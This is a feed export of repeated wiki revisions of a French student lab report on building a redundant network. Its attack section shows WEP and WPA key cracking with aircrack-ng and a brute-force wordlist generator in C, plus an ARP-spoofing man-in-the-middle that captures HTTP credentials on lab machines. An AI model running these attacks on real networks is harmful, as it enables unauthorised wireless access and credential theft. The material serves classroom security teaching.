&lt;br /&gt;
ensuite, on liste tous les paquets qui passent a vec la commande airodump en filtrant par le ssid de la craccote06 et le channel 9 qui est le channel ou se trouve la cracotte&lt;br /&gt;
&lt;br /&gt;
 airodump-ng --bssid 04:DA:D2:9C:50:55 -c 9 -w log wlan0mon&lt;br /&gt;
&lt;br /&gt;
Avec la commande aircrack on decode la clef wep&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                              Aircrack-ng 1.5.2 &lt;br /&gt;
                 [00:00:00] Tested 665 keys (got 99549 IVs)&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    0/ 50   F1(124160) 6C(112640) BA(112384) B4(111872) 18(111104) &lt;br /&gt;
    1    6/  1   32(110848) 28(109568) B5(109568) 11(109312) 52(109056) &lt;br /&gt;
    2    0/  2   A3(137216) AB(113408) D7(112384) 84(111616) 52(110592) &lt;br /&gt;
    3    0/  1   A3(137728) 7C(112896) 39(111872) 6B(111360) 10(111104) &lt;br /&gt;
    4    0/  1   A3(145920) D8(118272) 57(116224) 28(113408) 86(111872) &lt;br /&gt;
             KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:00:99:99:99 ] &lt;br /&gt;
 	Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==crackage Wpa==&lt;br /&gt;
&lt;br /&gt;
on effectue la meme procedure que pour la cle wep. Pour le decodage, on doit utiliser un dictionnaire de mots. Pour ce faire, on crée un petit programme en C qui va generer tous les mots de passes possibles qui sont sous la forme de 8 chifres :&lt;br /&gt;
&lt;br /&gt;
 #include &amp;quot;stdio.h&amp;quot;&lt;br /&gt;
 #include &amp;quot;stdlib.h&amp;quot;&lt;br /&gt;
 int main(){&lt;br /&gt;
 	int i=0;&lt;br /&gt;
 	FILE* fichier=fopen(&amp;quot;mdp&amp;quot;,&amp;quot;w+&amp;quot;);&lt;br /&gt;
 	for(i;i&amp;lt;=99999999;i++)&lt;br /&gt;
    {&lt;br /&gt;
        fprintf(fichier,&amp;quot;%08d\n&amp;quot;,i);&lt;br /&gt;
    }&lt;br /&gt;
    fclose(fichier);&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
si besoin, pour accelerer le traitement, on peut partager la charge de travail sur plusieurs pc. pour ce faire, on utilise la commande split pour separer le fichier:&lt;br /&gt;
 split -b 200000000 mdp&lt;br /&gt;
&lt;br /&gt;
Pour transferer les fichier, on utilise la commande :&lt;br /&gt;
 scp mdp zabethXX:mdp&lt;br /&gt;
&lt;br /&gt;
on effectue la commande :&lt;br /&gt;
 aircrack-ng logWpa-02.cap -w mdp&lt;br /&gt;
Cette commande va tester tous les mot de passes presents dans le fichier de mot de passe&lt;br /&gt;
&lt;br /&gt;
                              Aircrack-ng 1.5.2 &lt;br /&gt;
      [01:03:39] 20208040/102795810 keys tested (4001.16 k/s) &lt;br /&gt;
      Time left: 5 hours, 44 minutes, 1 second                  19.66%&lt;br /&gt;
                           KEY FOUND! [ 20133333 ]&lt;br /&gt;
      Master Key     : F4 DD 26 3A CD 9D 73 68 4F C5 6E DC DF AD FF 63 &lt;br /&gt;
                       A5 12 FB F0 66 F3 45 B0 30 44 24 53 CB 49 32 99 &lt;br /&gt;
      Transient Key  : 69 E3 37 64 12 48 43 2A BA D3 DF 47 FE 11 1A 6B &lt;br /&gt;
                       B0 4E 44 C4 72 8F EB B3 3F 9C 76 37 9F 34 89 C6 &lt;br /&gt;
                       7D 9B 34 68 22 AE 38 91 51 55 6B 5D 2F 31 E9 69 &lt;br /&gt;
                       E4 A5 9E CF 8B E7 EB 02 C7 44 4B AE 2A B4 7F 8E &lt;br /&gt;
      EAPOL HMAC     : 89 DE EA B7 55 FF 34 D4 8A D5 C6 E1 E2 2F 80 93&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==attaque par homme du millieu==&lt;br /&gt;
&lt;br /&gt;
Cette attaque consiste a se faire passer pour le routeur et ainssi modifier les données qui transites&lt;br /&gt;
&lt;br /&gt;
pour ce faire il faut modifier le fichier /proc/sys/net/ipv4/ip_forward. On utilise la commande : &lt;br /&gt;
 echo 1 &amp;gt; /proc/sys/net/ipv4/ip_forward&lt;br /&gt;
car ce fichier est un fichier specifique et il ne peut pas etre modifié avec des commandes classiques&lt;br /&gt;
&lt;br /&gt;
On modifie aussi les fichiers :&lt;br /&gt;
echo 0 &amp;gt; /proc/sys/net/ipv4/conf/all/rp_filter&lt;br /&gt;
echo 0 &amp;gt; /proc/sys/net/ipv4/conf/default/rp_filter&lt;br /&gt;
&lt;br /&gt;
On fait ensuite un ip r pour recuperer l'addresse ip du routeur et on envoie des reponces arp a notre cible avec la commande suivante :&lt;br /&gt;
 arpspoof -i bridge -t zabeth06 172.26.145.254&lt;br /&gt;
&lt;br /&gt;
bridge est l'interface que l'on utilise, zabeth06 est la cible et 172.26.145.254 est l'addresse du routeur.&lt;br /&gt;
&lt;br /&gt;
Le pc cible va recevoir des reponces arp et va changer ca table d'addressage en conciderant l'ordinateur attaquant comme son routeur. Il va donc envoyer ces requettes a ce dernier.&lt;br /&gt;
&lt;br /&gt;
Sur le pc attaquant, on peut utiliser wireschark avec comme filtre : &amp;lt;/code&amp;gt;host zabeth06 and port http&amp;lt;/code&amp;gt;. On vois alors toutes les connections de zabeth06 vers des sites http.&lt;br /&gt;
&lt;br /&gt;
En se connectant sur un site en http et donc non securisé, on peut visualiser l'ensemble des des communications entre l'ordinateur attaqué et les sites http comme les mots de passes&lt;br /&gt;
&lt;br /&gt;
 Authorization: Basic T3VpIGp1fdghtrGIUG46546\r\n&lt;br /&gt;
   Non d'utilisateur : Oui le pas de calais&lt;br /&gt;
   Mdp : le mdp&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=instalation dns securisé=&lt;br /&gt;
&lt;br /&gt;
[[Fichier:pastabox.site-2020-11-13-08_50_33-UTC.png]]&lt;/div&gt;</summary>
		<author><name>Tvitteco</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021_G6&amp;diff=53964</id>
		<title>TP sysres IMA2a5 2020/2021 G6</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021_G6&amp;diff=53964"/>
				<updated>2020-11-20T11:12:58Z</updated>
		
		<summary type="html">&lt;p&gt;Tvitteco : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Ce rapport présente la mise en place d’un réseau redondé et la gestion de la sécurité&lt;br /&gt;
&lt;br /&gt;
pastabox.site[http://193.48.57.169]&lt;br /&gt;
&lt;br /&gt;
__TOC__&lt;br /&gt;
==Partie commune==&lt;br /&gt;
&lt;br /&gt;
===Installation du 6509===&lt;br /&gt;
&lt;br /&gt;
Le routeur 6509 est un routeur que l'on peut modifier d'un point de vue hardware.&lt;br /&gt;
&lt;br /&gt;
On a donc dus installer le 6509 sur la baie et insérer les cartes superviseurs ainsi que les cartes d'entrées sorties.&lt;br /&gt;
&lt;br /&gt;
=== configuration 3560E ===&lt;br /&gt;
La configuration du 3560E se fait via un port série et minicom&lt;br /&gt;
&lt;br /&gt;
Elle consiste a se connecter au Vlan130 afin d'avoir un accès au réseau polytech ainsi qu'a internet, et de créer 11 Vlan.&lt;br /&gt;
Les Vlans:&lt;br /&gt;
Le Vlan 1 permet la communication entres les trois routeurs de l'architecture&lt;br /&gt;
Le Vlan 2 relie les routeurs au serveur capbreton qui héberge les machines virtuel&lt;br /&gt;
Les Vlans 3 a 11 serons distribués entre les personnes pour crée des réseaux locaux individuels&lt;br /&gt;
&lt;br /&gt;
Les interfaces:&lt;br /&gt;
L' interfaces 10Gbits 0/1 sont configurés en mode trunk pour la communication avec le 6509 via la fibre&lt;br /&gt;
l'interface 0/5 est configurée sur le vlan 2 pour la communication avec capbreton en Ethernet&lt;br /&gt;
l'interface 0/2 est configurée sur le vlan 2 pour la communication avec capbreton en Ethernet&lt;br /&gt;
&lt;br /&gt;
===Configuration de la redondance===&lt;br /&gt;
&lt;br /&gt;
Pour assurer la redondance des routeurs on utilise le logiciel ospf et on configure les métriques des routeurs(1 pour le routeur principal et 2 pour le routeur secondaire) afin de donner l'ordre de priorité des routeurs. Cette manipulation assure la redondance des serveurs en ipv4.&lt;br /&gt;
&lt;br /&gt;
Pour l'ipv6, la gestion de la redondance a été faite en configurant &amp;quot;nd router-preference&amp;quot; a high pour le 6509 et a low pour le 3560E. quant a l'interconnexion avec les internet, elle se fait avec les métriques comme dit précédemment.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Routeur virtuel===&lt;br /&gt;
&lt;br /&gt;
Les différentes machines virtuelles pressentes sur le Vlan 2 ont besoin, d'un routeur pour communiquer vers l'extérieur. Mais comme nous avons deux routeurs et que les VM ne peuvent en avoir qu'un, nous avons crée un routeur virtuel. Les VM envoient leurs paquets à l'adresses du routeur virtuel. Ces paquets sont alors envoyés par l'un ou l'autre des routeurs selon les routes que l'on a fixé.&lt;br /&gt;
&lt;br /&gt;
Pour fixer les routes, on a utiliser le HSRP de façon a ce que les communication passent en priorité sur le 6509 (si on ne fais pas cette manip les paquets sortent par le 3560E et reviennent par le 6509 ce qui peut poser des problèmes si l'un des deux routeurs tombe). On a donc installer HSRP sur les routeurs et on a définie la priorité du 6509 sur 120 et la priorité du 3506E sur 110. Les paquets passent dorénavant par le routeur qui a la plus haute priorité, ici le 6509.&lt;br /&gt;
&lt;br /&gt;
==Installation des VM==&lt;br /&gt;
&lt;br /&gt;
pastabox.site&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=Attaque=&lt;br /&gt;
==crackage WEP==&lt;br /&gt;
&lt;br /&gt;
on utilise airmon pour configurer la che wiffi pour recevoir tous les paquets qui passent&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlx40a5ef0598a3&lt;br /&gt;
&lt;br /&gt;
On peut voir que le reseau a été renomé:&lt;br /&gt;
&lt;br /&gt;
 root@zabeth07:~# airmon-ng&lt;br /&gt;
 PHY	Interface	Driver		Chipset&lt;br /&gt;
 phy2	wlan0mon	rt2800usb	Ralink Technology, Corp. RT5370&lt;br /&gt;
&lt;br /&gt;
ensuite, on liste tous les paquets qui passent a vec la commande airodump en filtrant par le ssid de la craccote06 et le channel 9 qui est le channel ou se trouve la cracotte&lt;br /&gt;
&lt;br /&gt;
 airodump-ng --bssid 04:DA:D2:9C:50:55 -c 9 -w log wlan0mon&lt;br /&gt;
&lt;br /&gt;
Avec la commande aircrack on decode la clef wep&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                              Aircrack-ng 1.5.2 &lt;br /&gt;
                 [00:00:00] Tested 665 keys (got 99549 IVs)&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    0/ 50   F1(124160) 6C(112640) BA(112384) B4(111872) 18(111104) &lt;br /&gt;
    1    6/  1   32(110848) 28(109568) B5(109568) 11(109312) 52(109056) &lt;br /&gt;
    2    0/  2   A3(137216) AB(113408) D7(112384) 84(111616) 52(110592) &lt;br /&gt;
    3    0/  1   A3(137728) 7C(112896) 39(111872) 6B(111360) 10(111104) &lt;br /&gt;
    4    0/  1   A3(145920) D8(118272) 57(116224) 28(113408) 86(111872) &lt;br /&gt;
             KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:00:99:99:99 ] &lt;br /&gt;
 	Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==crackage Wpa==&lt;br /&gt;
&lt;br /&gt;
on effectue la meme procedure que pour la cle wep. Pour le decodage, on doit utiliser un dictionnaire de mots. Pour ce faire, on crée un petit programme en C qui va generer tous les mots de passes possibles qui sont sous la forme de 8 chifres :&lt;br /&gt;
&lt;br /&gt;
 #include &amp;quot;stdio.h&amp;quot;&lt;br /&gt;
 #include &amp;quot;stdlib.h&amp;quot;&lt;br /&gt;
 int main(){&lt;br /&gt;
 	int i=0;&lt;br /&gt;
 	FILE* fichier=fopen(&amp;quot;mdp&amp;quot;,&amp;quot;w+&amp;quot;);&lt;br /&gt;
 	for(i;i&amp;lt;=99999999;i++)&lt;br /&gt;
    {&lt;br /&gt;
        fprintf(fichier,&amp;quot;%08d\n&amp;quot;,i);&lt;br /&gt;
    }&lt;br /&gt;
    fclose(fichier);&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
si besoin, pour accelerer le traitement, on peut partager la charge de travail sur plusieurs pc. pour ce faire, on utilise la commande split pour separer le fichier:&lt;br /&gt;
 split -b 200000000 mdp&lt;br /&gt;
&lt;br /&gt;
Pour transferer les fichier, on utilise la commande :&lt;br /&gt;
 scp mdp zabethXX:mdp&lt;br /&gt;
&lt;br /&gt;
on effectue la commande :&lt;br /&gt;
 aircrack-ng logWpa-02.cap -w mdp&lt;br /&gt;
Cette commande va tester tous les mot de passes presents dans le fichier de mot de passe&lt;br /&gt;
&lt;br /&gt;
                              Aircrack-ng 1.5.2 &lt;br /&gt;
      [01:03:39] 20208040/102795810 keys tested (4001.16 k/s) &lt;br /&gt;
      Time left: 5 hours, 44 minutes, 1 second                  19.66%&lt;br /&gt;
                           KEY FOUND! [ 20133333 ]&lt;br /&gt;
      Master Key     : F4 DD 26 3A CD 9D 73 68 4F C5 6E DC DF AD FF 63 &lt;br /&gt;
                       A5 12 FB F0 66 F3 45 B0 30 44 24 53 CB 49 32 99 &lt;br /&gt;
      Transient Key  : 69 E3 37 64 12 48 43 2A BA D3 DF 47 FE 11 1A 6B &lt;br /&gt;
                       B0 4E 44 C4 72 8F EB B3 3F 9C 76 37 9F 34 89 C6 &lt;br /&gt;
                       7D 9B 34 68 22 AE 38 91 51 55 6B 5D 2F 31 E9 69 &lt;br /&gt;
                       E4 A5 9E CF 8B E7 EB 02 C7 44 4B AE 2A B4 7F 8E &lt;br /&gt;
      EAPOL HMAC     : 89 DE EA B7 55 FF 34 D4 8A D5 C6 E1 E2 2F 80 93&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==attaque par homme du millieu==&lt;br /&gt;
&lt;br /&gt;
Cette attaque consiste a se faire passer pour le routeur et ainssi modifier les données qui transites&lt;br /&gt;
&lt;br /&gt;
pour ce faire il faut modifier le fichier /proc/sys/net/ipv4/ip_forward. On utilise la commande : &lt;br /&gt;
 echo 1 &amp;gt; /proc/sys/net/ipv4/ip_forward&lt;br /&gt;
car ce fichier est un fichier specifique et il ne peut pas etre modifié avec des commandes classiques&lt;br /&gt;
&lt;br /&gt;
On modifie aussi les fichiers :&lt;br /&gt;
echo 0 &amp;gt; /proc/sys/net/ipv4/conf/all/rp_filter&lt;br /&gt;
echo 0 &amp;gt; /proc/sys/net/ipv4/conf/default/rp_filter&lt;br /&gt;
&lt;br /&gt;
On fait ensuite un ip r pour recuperer l'addresse ip du routeur et on envoie des reponces arp a notre cible avec la commande suivante :&lt;br /&gt;
 arpspoof -i bridge -t zabeth06 172.26.145.254&lt;br /&gt;
&lt;br /&gt;
bridge est l'interface que l'on utilise, zabeth06 est la cible et 172.26.145.254 est l'addresse du routeur.&lt;br /&gt;
&lt;br /&gt;
Le pc cible va recevoir des reponces arp et va changer ca table d'addressage en conciderant l'ordinateur attaquant comme son routeur. Il va donc envoyer ces requettes a ce dernier.&lt;br /&gt;
&lt;br /&gt;
Sur le pc attaquant, on peut utiliser wireschark avec comme filtre : &amp;lt;/code&amp;gt;host zabeth06 and port http&amp;lt;/code&amp;gt;. On vois alors toutes les connections de zabeth06 vers des sites http.&lt;br /&gt;
&lt;br /&gt;
En se connectant sur un site en http et donc non securisé, on peut visualiser l'ensemble des des communications entre l'ordinateur attaqué et les sites http comme les mots de passes&lt;br /&gt;
&lt;br /&gt;
 Authorization: Basic T3VpIGp1fdghtrGIUG46546\r\n&lt;br /&gt;
   Non d'utilisateur : Oui le pas de calais&lt;br /&gt;
   Mdp : le mdp&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=instalation dns securisé=&lt;br /&gt;
&lt;br /&gt;
[[Fichier:pastabox.site-2020-11-13-08_50_33-UTC.png]]&lt;/div&gt;</summary>
		<author><name>Tvitteco</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021_G6&amp;diff=53963</id>
		<title>TP sysres IMA2a5 2020/2021 G6</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021_G6&amp;diff=53963"/>
				<updated>2020-11-20T11:12:37Z</updated>
		
		<summary type="html">&lt;p&gt;Tvitteco : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Ce rapport présente la mise en place d’un réseau redondé et la gestion de la sécurité&lt;br /&gt;
&lt;br /&gt;
pastabox.site [pastabox.site,http://193.48.57.169]&lt;br /&gt;
&lt;br /&gt;
__TOC__&lt;br /&gt;
==Partie commune==&lt;br /&gt;
&lt;br /&gt;
===Installation du 6509===&lt;br /&gt;
&lt;br /&gt;
Le routeur 6509 est un routeur que l'on peut modifier d'un point de vue hardware.&lt;br /&gt;
&lt;br /&gt;
On a donc dus installer le 6509 sur la baie et insérer les cartes superviseurs ainsi que les cartes d'entrées sorties.&lt;br /&gt;
&lt;br /&gt;
=== configuration 3560E ===&lt;br /&gt;
La configuration du 3560E se fait via un port série et minicom&lt;br /&gt;
&lt;br /&gt;
Elle consiste a se connecter au Vlan130 afin d'avoir un accès au réseau polytech ainsi qu'a internet, et de créer 11 Vlan.&lt;br /&gt;
Les Vlans:&lt;br /&gt;
Le Vlan 1 permet la communication entres les trois routeurs de l'architecture&lt;br /&gt;
Le Vlan 2 relie les routeurs au serveur capbreton qui héberge les machines virtuel&lt;br /&gt;
Les Vlans 3 a 11 serons distribués entre les personnes pour crée des réseaux locaux individuels&lt;br /&gt;
&lt;br /&gt;
Les interfaces:&lt;br /&gt;
L' interfaces 10Gbits 0/1 sont configurés en mode trunk pour la communication avec le 6509 via la fibre&lt;br /&gt;
l'interface 0/5 est configurée sur le vlan 2 pour la communication avec capbreton en Ethernet&lt;br /&gt;
l'interface 0/2 est configurée sur le vlan 2 pour la communication avec capbreton en Ethernet&lt;br /&gt;
&lt;br /&gt;
===Configuration de la redondance===&lt;br /&gt;
&lt;br /&gt;
Pour assurer la redondance des routeurs on utilise le logiciel ospf et on configure les métriques des routeurs(1 pour le routeur principal et 2 pour le routeur secondaire) afin de donner l'ordre de priorité des routeurs. Cette manipulation assure la redondance des serveurs en ipv4.&lt;br /&gt;
&lt;br /&gt;
Pour l'ipv6, la gestion de la redondance a été faite en configurant &amp;quot;nd router-preference&amp;quot; a high pour le 6509 et a low pour le 3560E. quant a l'interconnexion avec les internet, elle se fait avec les métriques comme dit précédemment.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Routeur virtuel===&lt;br /&gt;
&lt;br /&gt;
Les différentes machines virtuelles pressentes sur le Vlan 2 ont besoin, d'un routeur pour communiquer vers l'extérieur. Mais comme nous avons deux routeurs et que les VM ne peuvent en avoir qu'un, nous avons crée un routeur virtuel. Les VM envoient leurs paquets à l'adresses du routeur virtuel. Ces paquets sont alors envoyés par l'un ou l'autre des routeurs selon les routes que l'on a fixé.&lt;br /&gt;
&lt;br /&gt;
Pour fixer les routes, on a utiliser le HSRP de façon a ce que les communication passent en priorité sur le 6509 (si on ne fais pas cette manip les paquets sortent par le 3560E et reviennent par le 6509 ce qui peut poser des problèmes si l'un des deux routeurs tombe). On a donc installer HSRP sur les routeurs et on a définie la priorité du 6509 sur 120 et la priorité du 3506E sur 110. Les paquets passent dorénavant par le routeur qui a la plus haute priorité, ici le 6509.&lt;br /&gt;
&lt;br /&gt;
==Installation des VM==&lt;br /&gt;
&lt;br /&gt;
pastabox.site&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=Attaque=&lt;br /&gt;
==crackage WEP==&lt;br /&gt;
&lt;br /&gt;
on utilise airmon pour configurer la che wiffi pour recevoir tous les paquets qui passent&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlx40a5ef0598a3&lt;br /&gt;
&lt;br /&gt;
On peut voir que le reseau a été renomé:&lt;br /&gt;
&lt;br /&gt;
 root@zabeth07:~# airmon-ng&lt;br /&gt;
 PHY	Interface	Driver		Chipset&lt;br /&gt;
 phy2	wlan0mon	rt2800usb	Ralink Technology, Corp. RT5370&lt;br /&gt;
&lt;br /&gt;
ensuite, on liste tous les paquets qui passent a vec la commande airodump en filtrant par le ssid de la craccote06 et le channel 9 qui est le channel ou se trouve la cracotte&lt;br /&gt;
&lt;br /&gt;
 airodump-ng --bssid 04:DA:D2:9C:50:55 -c 9 -w log wlan0mon&lt;br /&gt;
&lt;br /&gt;
Avec la commande aircrack on decode la clef wep&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                              Aircrack-ng 1.5.2 &lt;br /&gt;
                 [00:00:00] Tested 665 keys (got 99549 IVs)&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    0/ 50   F1(124160) 6C(112640) BA(112384) B4(111872) 18(111104) &lt;br /&gt;
    1    6/  1   32(110848) 28(109568) B5(109568) 11(109312) 52(109056) &lt;br /&gt;
    2    0/  2   A3(137216) AB(113408) D7(112384) 84(111616) 52(110592) &lt;br /&gt;
    3    0/  1   A3(137728) 7C(112896) 39(111872) 6B(111360) 10(111104) &lt;br /&gt;
    4    0/  1   A3(145920) D8(118272) 57(116224) 28(113408) 86(111872) &lt;br /&gt;
             KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:00:99:99:99 ] &lt;br /&gt;
 	Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==crackage Wpa==&lt;br /&gt;
&lt;br /&gt;
on effectue la meme procedure que pour la cle wep. Pour le decodage, on doit utiliser un dictionnaire de mots. Pour ce faire, on crée un petit programme en C qui va generer tous les mots de passes possibles qui sont sous la forme de 8 chifres :&lt;br /&gt;
&lt;br /&gt;
 #include &amp;quot;stdio.h&amp;quot;&lt;br /&gt;
 #include &amp;quot;stdlib.h&amp;quot;&lt;br /&gt;
 int main(){&lt;br /&gt;
 	int i=0;&lt;br /&gt;
 	FILE* fichier=fopen(&amp;quot;mdp&amp;quot;,&amp;quot;w+&amp;quot;);&lt;br /&gt;
 	for(i;i&amp;lt;=99999999;i++)&lt;br /&gt;
    {&lt;br /&gt;
        fprintf(fichier,&amp;quot;%08d\n&amp;quot;,i);&lt;br /&gt;
    }&lt;br /&gt;
    fclose(fichier);&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
si besoin, pour accelerer le traitement, on peut partager la charge de travail sur plusieurs pc. pour ce faire, on utilise la commande split pour separer le fichier:&lt;br /&gt;
 split -b 200000000 mdp&lt;br /&gt;
&lt;br /&gt;
Pour transferer les fichier, on utilise la commande :&lt;br /&gt;
 scp mdp zabethXX:mdp&lt;br /&gt;
&lt;br /&gt;
on effectue la commande :&lt;br /&gt;
 aircrack-ng logWpa-02.cap -w mdp&lt;br /&gt;
Cette commande va tester tous les mot de passes presents dans le fichier de mot de passe&lt;br /&gt;
&lt;br /&gt;
                              Aircrack-ng 1.5.2 &lt;br /&gt;
      [01:03:39] 20208040/102795810 keys tested (4001.16 k/s) &lt;br /&gt;
      Time left: 5 hours, 44 minutes, 1 second                  19.66%&lt;br /&gt;
                           KEY FOUND! [ 20133333 ]&lt;br /&gt;
      Master Key     : F4 DD 26 3A CD 9D 73 68 4F C5 6E DC DF AD FF 63 &lt;br /&gt;
                       A5 12 FB F0 66 F3 45 B0 30 44 24 53 CB 49 32 99 &lt;br /&gt;
      Transient Key  : 69 E3 37 64 12 48 43 2A BA D3 DF 47 FE 11 1A 6B &lt;br /&gt;
                       B0 4E 44 C4 72 8F EB B3 3F 9C 76 37 9F 34 89 C6 &lt;br /&gt;
                       7D 9B 34 68 22 AE 38 91 51 55 6B 5D 2F 31 E9 69 &lt;br /&gt;
                       E4 A5 9E CF 8B E7 EB 02 C7 44 4B AE 2A B4 7F 8E &lt;br /&gt;
      EAPOL HMAC     : 89 DE EA B7 55 FF 34 D4 8A D5 C6 E1 E2 2F 80 93&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==attaque par homme du millieu==&lt;br /&gt;
&lt;br /&gt;
Cette attaque consiste a se faire passer pour le routeur et ainssi modifier les données qui transites&lt;br /&gt;
&lt;br /&gt;
pour ce faire il faut modifier le fichier /proc/sys/net/ipv4/ip_forward. On utilise la commande : &lt;br /&gt;
 echo 1 &amp;gt; /proc/sys/net/ipv4/ip_forward&lt;br /&gt;
car ce fichier est un fichier specifique et il ne peut pas etre modifié avec des commandes classiques&lt;br /&gt;
&lt;br /&gt;
On modifie aussi les fichiers :&lt;br /&gt;
echo 0 &amp;gt; /proc/sys/net/ipv4/conf/all/rp_filter&lt;br /&gt;
echo 0 &amp;gt; /proc/sys/net/ipv4/conf/default/rp_filter&lt;br /&gt;
&lt;br /&gt;
On fait ensuite un ip r pour recuperer l'addresse ip du routeur et on envoie des reponces arp a notre cible avec la commande suivante :&lt;br /&gt;
 arpspoof -i bridge -t zabeth06 172.26.145.254&lt;br /&gt;
&lt;br /&gt;
bridge est l'interface que l'on utilise, zabeth06 est la cible et 172.26.145.254 est l'addresse du routeur.&lt;br /&gt;
&lt;br /&gt;
Le pc cible va recevoir des reponces arp et va changer ca table d'addressage en conciderant l'ordinateur attaquant comme son routeur. Il va donc envoyer ces requettes a ce dernier.&lt;br /&gt;
&lt;br /&gt;
Sur le pc attaquant, on peut utiliser wireschark avec comme filtre : &amp;lt;/code&amp;gt;host zabeth06 and port http&amp;lt;/code&amp;gt;. On vois alors toutes les connections de zabeth06 vers des sites http.&lt;br /&gt;
&lt;br /&gt;
En se connectant sur un site en http et donc non securisé, on peut visualiser l'ensemble des des communications entre l'ordinateur attaqué et les sites http comme les mots de passes&lt;br /&gt;
&lt;br /&gt;
 Authorization: Basic T3VpIGp1fdghtrGIUG46546\r\n&lt;br /&gt;
   Non d'utilisateur : Oui le pas de calais&lt;br /&gt;
   Mdp : le mdp&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=instalation dns securisé=&lt;br /&gt;
&lt;br /&gt;
[[Fichier:pastabox.site-2020-11-13-08_50_33-UTC.png]]&lt;/div&gt;</summary>
		<author><name>Tvitteco</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021_G6&amp;diff=53962</id>
		<title>TP sysres IMA2a5 2020/2021 G6</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021_G6&amp;diff=53962"/>
				<updated>2020-11-20T11:12:23Z</updated>
		
		<summary type="html">&lt;p&gt;Tvitteco : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Ce rapport présente la mise en place d’un réseau redondé et la gestion de la sécurité&lt;br /&gt;
&lt;br /&gt;
pastabox.site [pastabox.site http://193.48.57.169]&lt;br /&gt;
&lt;br /&gt;
__TOC__&lt;br /&gt;
==Partie commune==&lt;br /&gt;
&lt;br /&gt;
===Installation du 6509===&lt;br /&gt;
&lt;br /&gt;
Le routeur 6509 est un routeur que l'on peut modifier d'un point de vue hardware.&lt;br /&gt;
&lt;br /&gt;
On a donc dus installer le 6509 sur la baie et insérer les cartes superviseurs ainsi que les cartes d'entrées sorties.&lt;br /&gt;
&lt;br /&gt;
=== configuration 3560E ===&lt;br /&gt;
La configuration du 3560E se fait via un port série et minicom&lt;br /&gt;
&lt;br /&gt;
Elle consiste a se connecter au Vlan130 afin d'avoir un accès au réseau polytech ainsi qu'a internet, et de créer 11 Vlan.&lt;br /&gt;
Les Vlans:&lt;br /&gt;
Le Vlan 1 permet la communication entres les trois routeurs de l'architecture&lt;br /&gt;
Le Vlan 2 relie les routeurs au serveur capbreton qui héberge les machines virtuel&lt;br /&gt;
Les Vlans 3 a 11 serons distribués entre les personnes pour crée des réseaux locaux individuels&lt;br /&gt;
&lt;br /&gt;
Les interfaces:&lt;br /&gt;
L' interfaces 10Gbits 0/1 sont configurés en mode trunk pour la communication avec le 6509 via la fibre&lt;br /&gt;
l'interface 0/5 est configurée sur le vlan 2 pour la communication avec capbreton en Ethernet&lt;br /&gt;
l'interface 0/2 est configurée sur le vlan 2 pour la communication avec capbreton en Ethernet&lt;br /&gt;
&lt;br /&gt;
===Configuration de la redondance===&lt;br /&gt;
&lt;br /&gt;
Pour assurer la redondance des routeurs on utilise le logiciel ospf et on configure les métriques des routeurs(1 pour le routeur principal et 2 pour le routeur secondaire) afin de donner l'ordre de priorité des routeurs. Cette manipulation assure la redondance des serveurs en ipv4.&lt;br /&gt;
&lt;br /&gt;
Pour l'ipv6, la gestion de la redondance a été faite en configurant &amp;quot;nd router-preference&amp;quot; a high pour le 6509 et a low pour le 3560E. quant a l'interconnexion avec les internet, elle se fait avec les métriques comme dit précédemment.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Routeur virtuel===&lt;br /&gt;
&lt;br /&gt;
Les différentes machines virtuelles pressentes sur le Vlan 2 ont besoin, d'un routeur pour communiquer vers l'extérieur. Mais comme nous avons deux routeurs et que les VM ne peuvent en avoir qu'un, nous avons crée un routeur virtuel. Les VM envoient leurs paquets à l'adresses du routeur virtuel. Ces paquets sont alors envoyés par l'un ou l'autre des routeurs selon les routes que l'on a fixé.&lt;br /&gt;
&lt;br /&gt;
